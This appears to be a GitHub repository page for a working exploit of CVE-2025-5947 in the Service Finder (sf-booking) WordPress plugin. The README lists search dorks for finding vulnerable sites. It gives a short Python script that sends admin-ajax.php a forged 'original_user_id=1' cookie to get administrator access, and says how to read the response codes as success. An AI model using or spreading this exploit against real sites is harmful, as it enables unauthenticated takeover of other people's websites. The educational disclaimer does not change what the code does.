Skip to content

M4rgs/CVE-2025-5947_Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

2 Commits
Β 
Β 

Repository files navigation

πŸ” WordPress Plugin Exploit β€” Service Finder (sf-booking)

Overview

The Service Finder plugin is a booking and service management system for WordPress.
Because of its popularity and complexity, some versions have had security issues related to unauthenticated AJAX endpoints or improper access controls.

This README explains how researchers can safely fingerprint installations and follow ethical practices (dbr krk).


Vulnerable WP dorks

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


Exploit Workflow

⚠️ Disclaimer:
These searches are for educational and research use only. Do not attempt unauthorized access or exploitation.

import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: βœ… VULN ! Redirect to admin panel as ADMIN
  • 400-499: ⚠️ Client error β€” the request was invalid or unauthorized, not vuln

References


Author

Taha Mounir


About

An mini exploit for the Service Finder -Bookings plugin WP

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors